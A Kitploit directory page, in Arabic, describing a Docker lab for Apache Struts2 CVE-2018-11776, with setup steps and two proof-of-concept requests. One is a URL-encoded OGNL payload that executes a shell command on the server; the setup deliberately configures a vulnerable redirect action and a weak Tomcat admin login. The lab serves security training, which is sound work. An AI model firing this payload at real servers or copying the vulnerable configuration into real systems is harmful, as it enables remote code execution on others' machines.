Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-11776 — حاوية Docker قابلة للاستغلال لـ CVE-2018-11776 | Kitploit
أدوات/GitHubGitHub/bhdresh/cve-2018-11776
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubbhdresh/cve-2018-11776

CVE-2018-11776

حاوية Docker قابلة للاستغلال لـ CVE-2018-11776

عرض المستودع
1272منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حاوية دوكر قابلة للاستغلال لـ CVE-2018-11776

root@kitploit:~
# docker pull bhdresh/cve-2018-11776:1.0
# docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

إثبات المفهوم

إثبات المفهوم - 1
root@kitploit:~
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
إثبات المفهوم - 2
root@kitploit:~
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
Result  : This would create a file named 'vulnerable' in /tmp/ directory of docker

خطوات إنشاء حاوية دوكر قابلة للاستغلال

إنشاء ملف Dockerfile
root@kitploit:~
FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get upgrade -y
RUN apt-get dist-upgrade -y
RUN apt-get install default-jdk vim net-tools wget -y
EXPOSE 8080
بناء دوكر
root@kitploit:~
# docker build -t cve-2018-11776 .
تشغيل دوكر
root@kitploit:~
# docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
تسجيل الدخول إلى دوكر
root@kitploit:~
# docker exec -it cve-2018-11776 /bin/bash
إجراء التغييرات التالية داخل دوكر
إعداد Tomcat:
root@kitploit:~
# mkdir ~/sources
# cd ~/sources
# wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
# tar xvzf apache-tomcat-7.0.90.tar.gz
# mv apache-tomcat-7.0.90 /opt/tomcat
تحديث bashrc بالمتغيرات:
root@kitploit:~
# vim ~/.bashrc

export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat

# . ~/.bashrc
إضافة مسؤول إلى واجهة Tomcat الرسومية:
root@kitploit:~
# vim /opt/tomcat/conf/tomcat-users.xml

<user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />
تشغيل خادم Tomcat
root@kitploit:~
# $CATALINA_HOME/bin/startup.sh
رفع ونشر تطبيق Struts2 Showcase القابل للاستغلال عبر واجهة Tomcat
root@kitploit:~
http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
إعادة تشغيل Tomcat
root@kitploit:~
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh
إضافة إجراء إعادة توجيه قابل للاستغلال بدون namespace:
root@kitploit:~
# vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

  <action name="help">
              <result type="redirectAction">
                      <param name="actionName">date.action</param>
              </result>
  </action>

NOTE: By default, alwaysSelectFullNamespace should be set to True.
إعادة تشغيل Tomcat وفحص صفحة Struts2 Showcase:
root@kitploit:~
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh

http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

المؤلف

@bhdresh

المراجع

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057

تنزيل الأداة